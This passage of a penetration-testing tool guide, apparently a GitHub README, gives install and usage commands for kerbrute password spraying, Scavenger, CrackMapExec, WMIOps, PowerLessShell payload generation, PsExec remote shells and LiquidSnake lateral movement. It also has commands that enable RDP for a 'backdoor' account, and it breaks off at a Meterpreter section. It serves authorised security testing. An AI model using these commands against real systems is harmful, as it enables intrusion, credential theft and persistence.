data-snippet-clipboard-copy-content="# User Enumeration ./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt # Password Spray ./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com domain_users.txt Password123 # Brute User ./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com passwords.lst thoffman # Brute Force ./kerbrute -d lab.ropnop.com bruteforce -"><pre><span class="pl-c"><span class="pl-c">#</span> User Enumeration</span> ./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt <span class="pl-c"><span class="pl-c">#</span> Password Spray</span> ./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com domain_users.txt Password123 <span class="pl-c"><span class="pl-c">#</span> Brute User</span> ./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com passwords.lst thoffman <span class="pl-c"><span class="pl-c">#</span> Brute Force</span> ./kerbrute -d lab.ropnop.com bruteforce -</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/212205129-e5906b50-78c5-4507-8b1e-74a6686bed14.png"><img src="https://user-images.githubusercontent.com/100603074/212205129-e5906b50-78c5-4507-8b1e-74a6686bed14.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://matthewomccorkle.github.io/day_032_kerbrute/" rel="nofollow">https://matthewomccorkle.github.io/day_032_kerbrute/</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/SpiderLabs/scavenger">scavenger</a></h3><a id="user-content-scavenger" class="anchor" aria-label="Permalink: 🔙scavenger" href="#scavenger"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 
0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Scavenger is a multi-threaded post-exploitation scanning tool for scavenging systems, finding most frequently used files and folders as well as "interesting" files containing sensitive information.</p> <p dir="auto">Scavenger confronts a challenging issue typically faced by Penetration Testing consultants during internal penetration tests; the issue of having too much access to too many systems with limited days for testing.</p> <p dir="auto"><strong>Install:</strong></p> <p dir="auto">First install CrackMapExec from <a href="https://github.com/byt3bl33d3r/CrackMapExec/wiki/Installation">here</a>.</p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/SpiderLabs/scavenger cd scavenger"><pre>git clone https://github.com/SpiderLabs/scavenger <span class="pl-c1">cd</span> scavenger</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Search for interesting files on victim endpoint python3 ./scavenger.py smb -t 10.0.0.10 -u administrator -p Password123 -d test.local"><pre><span class="pl-c"><span class="pl-c">#</span> Search for interesting files on victim endpoint</span> python3 ./scavenger.py smb -t 10.0.0.10 -u administrator -p Password123 -d test.local</pre></div> <p dir="auto">Nice <a 
href="https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/scavenger-post-exploitation-tool-for-collecting-vital-data/" rel="nofollow">blog post</a>.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/216736914-e7a7fe26-3531-4ae1-9962-fce130d8ab62.png"><img src="https://user-images.githubusercontent.com/100603074/216736914-e7a7fe26-3531-4ae1-9962-fce130d8ab62.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/scavenger-post-exploitation-tool-for-collecting-vital-data/" rel="nofollow">https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/scavenger-post-exploitation-tool-for-collecting-vital-data/</a></em></p> <div class="markdown-heading" dir="auto"><h1 tabindex="-1" class="heading-element" dir="auto">Lateral Movement</h1><a id="user-content-lateral-movement" class="anchor" aria-label="Permalink: Lateral Movement" href="#lateral-movement"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/Porchetta-Industries/CrackMapExec">crackmapexec</a></h3><a id="user-content-crackmapexec" class="anchor" aria-label="Permalink: 
🔙crackmapexec" href="#crackmapexec"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">This is a great tool for pivoting in a Windows/Active Directory environment using credential pairs (username:password, username:hash). It also offers other features, ranging from enumerating logged-on users and spidering SMB shares to executing psexec-style attacks, auto-injecting Mimikatz/Shellcode/DLLs into memory using PowerShell, dumping the NTDS.dit, and more.</p> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="sudo apt install crackmapexec"><pre>sudo apt install crackmapexec</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="crackmapexec smb <ip address> -d <domain> -u <user list> -p <password list>"><pre>crackmapexec smb <span class="pl-k"><</span>ip address<span class="pl-k">></span> -d <span class="pl-k"><</span>domain<span class="pl-k">></span> -u <span class="pl-k"><</span>user list<span class="pl-k">></span> -p <span class="pl-k"><</span>password list<span class="pl-k">></span></pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" 
href="https://user-images.githubusercontent.com/100603074/192070626-4549ec06-e2c5-477b-a97d-0f29e48bbfbc.png"><img src="https://user-images.githubusercontent.com/100603074/192070626-4549ec06-e2c5-477b-a97d-0f29e48bbfbc.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/FortyNorthSecurity/WMIOps">WMIOps</a></h3><a id="user-content-wmiops" class="anchor" aria-label="Permalink: 🔙WMIOps" href="#wmiops"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">WMIOps is a PowerShell script that uses WMI to perform a variety of actions on hosts, local or remote, within a Windows environment.</p> <p dir="auto">Developed by <a href="https://twitter.com/christruncer" rel="nofollow">@christruncer</a>.</p> <p dir="auto">Original <a href="https://www.christophertruncer.com/introducing-wmi-ops/" rel="nofollow">blog post</a> documenting the release.</p> <p dir="auto"><strong>Install: (PowerShell)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/FortyNorthSecurity/WMIOps Import-Module WMIOps.ps1"><pre>git clone https://github.com/FortyNorthSecurity/WMIOps Import-Module WMIOps.ps1</pre></div> <p dir="auto"><strong>Note:</strong> The clone creates a <code>WMIOps</code> directory, so either <code>cd</code> into it first or import the script by path (<code>Import-Module .\WMIOps\WMIOps.ps1</code>); as written, the two commands are separate steps, not one line.</p> <p 
dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Executes a user specified command on the target machine Invoke-ExecCommandWMI # Returns all running processes from the target machine Get-RunningProcessesWMI # Checks if a user is active at the desktop on the target machine (or if away from their machine) Find-ActiveUsersWMI # Lists all local and network connected drives on target system Get-SystemDrivesWMI # Executes a powershell script in memory on the target host via WMI and returns the output Invoke-RemoteScriptWithOutput"><pre><span class="pl-c"><span class="pl-c">#</span> Executes a user specified command on the target machine</span> Invoke-ExecCommandWMI <span class="pl-c"><span class="pl-c">#</span> Returns all running processes from the target machine</span> Get-RunningProcessesWMI <span class="pl-c"><span class="pl-c">#</span> Checks if a user is active at the desktop on the target machine (or if away from their machine)</span> Find-ActiveUsersWMI <span class="pl-c"><span class="pl-c">#</span> Lists all local and network connected drives on target system</span> Get-SystemDrivesWMI <span class="pl-c"><span class="pl-c">#</span> Executes a powershell script in memory on the target host via WMI and returns the output</span> Invoke-RemoteScriptWithOutput</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210266302-9c098f03-24fd-4f91-af63-db2fe04c01c7.png"><img src="https://user-images.githubusercontent.com/100603074/210266302-9c098f03-24fd-4f91-af63-db2fe04c01c7.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210266314-e51c7c99-1e2a-473e-926c-074b56fe79a5.png"><img 
src="https://user-images.githubusercontent.com/100603074/210266314-e51c7c99-1e2a-473e-926c-074b56fe79a5.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Images used from <a href="https://pentestlab.blog/2017/11/20/command-and-control-wmi/" rel="nofollow">https://pentestlab.blog/2017/11/20/command-and-control-wmi/</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/Mr-Un1k0d3r/PowerLessShell">PowerLessShell</a></h3><a id="user-content-powerlessshell" class="anchor" aria-label="Permalink: 🔙PowerLessShell" href="#powerlessshell"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Tool that uses MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe.</p> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/Mr-Un1k0d3r/PowerLessShell cd PowerLessShell"><pre>git clone https://github.com/Mr-Un1k0d3r/PowerLessShell <span class="pl-c1">cd</span> PowerLessShell</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" 
data-snippet-clipboard-copy-content="# Help python PowerLessShell.py -h # Generate PowerShell payload python PowerLessShell.py -type powershell -source script.ps1 -output malicious.csproj # Generating a shellcode payload python PowerLessShell.py -source shellcode.raw -output malicious.csproj"><pre><span class="pl-c"><span class="pl-c">#</span> Help</span> python PowerLessShell.py -h <span class="pl-c"><span class="pl-c">#</span> Generate PowerShell payload </span> python PowerLessShell.py -type powershell -source script.ps1 -output malicious.csproj <span class="pl-c"><span class="pl-c">#</span> Generating a shellcode payload</span> python PowerLessShell.py -source shellcode.raw -output malicious.csproj</pre></div> <p dir="auto">Full usage information can be found <a href="https://github.com/Mr-Un1k0d3r/PowerLessShell#usage">here</a>.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210266357-75a3f09d-9855-46d5-ad13-69c677b4499f.png"><img src="https://user-images.githubusercontent.com/100603074/210266357-75a3f09d-9855-46d5-ad13-69c677b4499f.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://bank-security.medium.com/how-to-running-powershell-commands-without-powershell-exe-a6a19595f628" rel="nofollow">https://bank-security.medium.com/how-to-running-powershell-commands-without-powershell-exe-a6a19595f628</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://learn.microsoft.com/en-us/sysinternals/downloads/psexec" rel="nofollow">PsExec</a></h3><a id="user-content-psexec" class="anchor" aria-label="Permalink: 🔙PsExec" href="#psexec"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 
.018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">PsExec is part of the Sysinternals suite of tools, a collection of utilities for managing and troubleshooting Windows systems.</p> <p dir="auto">It is great for remotely executing commands on target machines.</p> <p dir="auto"><strong>Note:</strong> Some AV/EDR products classify PsExec as a 'remote admin tool' (riskware) rather than as a virus and may quarantine it on the target, and its use is widely logged and alerted on, so expect it to be noisy. The install below fetches the zip over HTTPS but does not otherwise verify it; check the Microsoft Authenticode signature of the extracted binary (<code>Get-AuthenticodeSignature .\psexec.exe</code>) before running it on a client's network.</p> <p dir="auto"><strong>Install: (PowerShell)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="Invoke-WebRequest -Uri 'https://download.sysinternals.com/files/PSTools.zip' -OutFile 'pstools.zip' Expand-Archive -Path 'pstools.zip' -DestinationPath "$env:TEMP\pstools" Move-Item -Path "$env:TEMP\pstools\psexec.exe" . 
Remove-Item -Path "$env:TEMP\pstools" -Recurse"><pre>Invoke-WebRequest -Uri <span class="pl-s"><span class="pl-pds">'</span>https://download.sysinternals.com/files/PSTools.zip<span class="pl-pds">'</span></span> -OutFile <span class="pl-s"><span class="pl-pds">'</span>pstools.zip<span class="pl-pds">'</span></span> Expand-Archive -Path <span class="pl-s"><span class="pl-pds">'</span>pstools.zip<span class="pl-pds">'</span></span> -DestinationPath <span class="pl-s"><span class="pl-pds">"</span><span class="pl-smi">$env</span>:TEMP\pstools<span class="pl-pds">"</span></span> Move-Item -Path <span class="pl-s"><span class="pl-pds">"</span><span class="pl-smi">$env</span>:TEMP\pstools\psexec.exe<span class="pl-pds">"</span></span> <span class="pl-c1">.</span> Remove-Item -Path <span class="pl-s"><span class="pl-pds">"</span><span class="pl-smi">$env</span>:TEMP\pstools<span class="pl-pds">"</span></span> -Recurse</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Prevent the license agreement from being displayed psexec.exe /accepteula # Run the 'hostname' command on remote machine psexec.exe \\REMOTECOMPUTER hostname # Run the 'hostname' command on EVERYTHING (on the domain) psexec.exe \\* hostname # Run a local executable on a remote machine psexec.exe \\REMOTECOMPUTER -c C:\Tools\program.exe # Run the 'hostname' command with different credentials psexec.exe \\REMOTECOMPUTER hostname -u localadmin -p secret-p@$$word # Spawn shell on remote machine psexec.exe -s \\REMOTECOMPUTER cmd"><pre><span class="pl-c"><span class="pl-c">#</span> Prevent the license agreement from being displayed</span> psexec.exe /accepteula <span class="pl-c"><span class="pl-c">#</span> Run the 'hostname' command on remote machine</span> psexec.exe <span class="pl-cce">\\</span>REMOTECOMPUTER hostname <span class="pl-c"><span class="pl-c">#</span> Run 
the 'hostname' command on EVERYTHING (on the domain)</span> psexec.exe <span class="pl-cce">\\</span><span class="pl-k">*</span> hostname <span class="pl-c"><span class="pl-c">#</span> Run a local executable on a remote machine</span> psexec.exe <span class="pl-cce">\\</span>REMOTECOMPUTER -c C:<span class="pl-cce">\T</span>ools<span class="pl-cce">\p</span>rogram.exe <span class="pl-c"><span class="pl-c">#</span> Run the 'hostname' command with different credentials</span> psexec.exe <span class="pl-cce">\\</span>REMOTECOMPUTER hostname -u localadmin -p secret-p@<span class="pl-smi">$$</span>word <span class="pl-c"><span class="pl-c">#</span> Spawn shell on remote machine</span> psexec.exe -s <span class="pl-cce">\\</span>REMOTECOMPUTER cmd</pre></div> <p dir="auto"><strong>Note:</strong> <code>\\*</code> targets every computer in the current domain, which is rarely in scope on a real engagement; prefer an explicit host list. Credentials given with <code>-u</code>/<code>-p</code> appear in the process command line (and so in process-creation logs on the attacking host), and <code>-s</code> runs the command as SYSTEM on the target.</p> <p dir="auto">A good <a href="https://adamtheautomator.com/psexec/" rel="nofollow">blog post</a> on PsExec usage.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210266376-8daa51d6-16d4-4422-b723-d1bc8b7f22e2.png"><img src="https://user-images.githubusercontent.com/100603074/210266376-8daa51d6-16d4-4422-b723-d1bc8b7f22e2.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://adamtheautomator.com/psexec/" rel="nofollow">https://adamtheautomator.com/psexec/</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/RiccardoAncarani/LiquidSnake">LiquidSnake</a></h3><a id="user-content-liquidsnake" class="anchor" aria-label="Permalink: 🔙LiquidSnake" href="#liquidsnake"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 
1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Liquid Snake is a program aimed at performing lateral movement against Windows systems without touching the disk.</p> <p dir="auto">The tool relies on a WMI event subscription to execute a .NET assembly in memory; the assembly listens for shellcode on a named pipe and then executes it using a variation of thread-hijacking shellcode injection.</p> <p dir="auto">The project is composed of two separate solutions:</p> <ul dir="auto"> <li><code>CSharpNamedPipeLoader</code> - the component that is transformed into VBS via GadgetToJScript</li> <li><code>LiquidSnake</code> - the component responsible for creating the WMI event subscription on the remote system</li> </ul> <p dir="auto"><strong>Install:</strong></p> <p dir="auto">Open both solutions in Visual Studio and build. 
<em>Make sure to target the x64 architecture for <code>CSharpNamedPipeLoader</code>.</em></p> <p dir="auto">Output: two separate EXEs, <code>CSharpNamedPipeLoader.exe</code> and <code>LiquidSnake.exe</code>.</p> <p dir="auto">Full build information can be found <a href="https://github.com/RiccardoAncarani/LiquidSnake#building">here</a>.</p> <p dir="auto"><strong>Usage:</strong></p> <p dir="auto">Use <code>LiquidSnake.exe</code> against a host on which you already have administrative access, as follows. The optional username, password and domain are passed in cleartext on the command line (and so end up in command-line logging); omitting them, as in the first example, relies on the caller's existing access to the host.</p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="LiquidSnake.exe <host> [<username> <password> <domain>] LiquidSnake.exe dc01.isengard.local LiquidSnake.exe dc01.isengard.local saruman DeathToFrodo123 isengard.local"><pre>LiquidSnake.exe <span class="pl-k"><</span>host<span class="pl-k">></span> [<span class="pl-k"><</span>username<span class="pl-k">></span> <span class="pl-k"><</span>password<span class="pl-k">></span> <span class="pl-k"><</span>domain<span class="pl-k">></span>] LiquidSnake.exe dc01.isengard.local LiquidSnake.exe dc01.isengard.local saruman DeathToFrodo123 isengard.local</pre></div> <p dir="auto">If everything went fine, you should obtain output similar to the following. Note that it shows a WMI event filter, consumer and subscription being created on the target: permanent WMI event subscriptions are a well-known persistence artifact that defenders hunt for, so confirm whether the tool removes them after execution and clean them up yourself if it does not.</p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="[*] Event filter created. [*] Event consumer created. [*] Subscription created, now sleeping [*] Sending some DCOM love.. [*] Sleeping again... long day"><pre>[<span class="pl-k">*</span>] Event filter created. [<span class="pl-k">*</span>] Event consumer created. [<span class="pl-k">*</span>] Subscription created, now sleeping [<span class="pl-k">*</span>] Sending some DCOM love.. [<span class="pl-k">*</span>] Sleeping again... 
long day</pre></div> <p dir="auto">General usage information can be found <a href="https://github.com/RiccardoAncarani/LiquidSnake#usage">here</a>.</p> <p dir="auto">Full <code>LiquidSnake</code> usage information can be found <a href="https://github.com/RiccardoAncarani/LiquidSnake/tree/main/LiquidSnake">here</a>.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210986763-2ffe49dd-597b-4ca2-a3ad-674b5fe39624.jpg"><img src="https://user-images.githubusercontent.com/100603074/210986763-2ffe49dd-597b-4ca2-a3ad-674b5fe39624.jpg" alt="LiquidSnake" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://github.com/RiccardoAncarani/LiquidSnake#usage">https://github.com/RiccardoAncarani/LiquidSnake#usage</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a>Enabling RDP</h3><a id="user-content-enabling-rdp" class="anchor" aria-label="Permalink: 🔙Enabling RDP" href="#enabling-rdp"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes net localgroup "Remote Desktop Users" "backdoor" /add"><pre>reg add <span class="pl-s"><span class="pl-pds">"</span>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server<span class="pl-pds">"</span></span> /v fDenyTSConnections /t REG_DWORD /d 0 /f netsh advfirewall firewall <span class="pl-c1">set</span> rule group=<span class="pl-s"><span class="pl-pds">"</span>remote desktop<span class="pl-pds">"</span></span> new enable=Yes net localgroup <span class="pl-s"><span class="pl-pds">"</span>Remote Desktop Users<span class="pl-pds">"</span></span> <span class="pl-s"><span class="pl-pds">"</span>backdoor<span class="pl-pds">"</span></span> /add</pre></div> <p dir="auto"><strong>Note:</strong> All three commands need local administrator rights and make persistent changes to the host (a registry value, a firewall rule group and a group membership). <code>backdoor</code> is a placeholder for an account that must already exist. Record each change and revert it at the end of the engagement.</p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a>Upgrading shell to meterpreter</h3><a id="user-content-upgrading-shell-to-meterpreter" class="anchor" aria-label="Permalink: 🔙Upgrading shell to meterpreter" href="#upgrading-shell-to-meterpreter"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Shells (<a href="https://infinitelogins.com/tag/payloads/" rel="nofollow">https://infinitelogins.com/tag/payloads/</a>)</p> <p dir="auto">After getting basic shell access to an endpoint, a Meterpreter session is nicer to continue with.</p> <p 
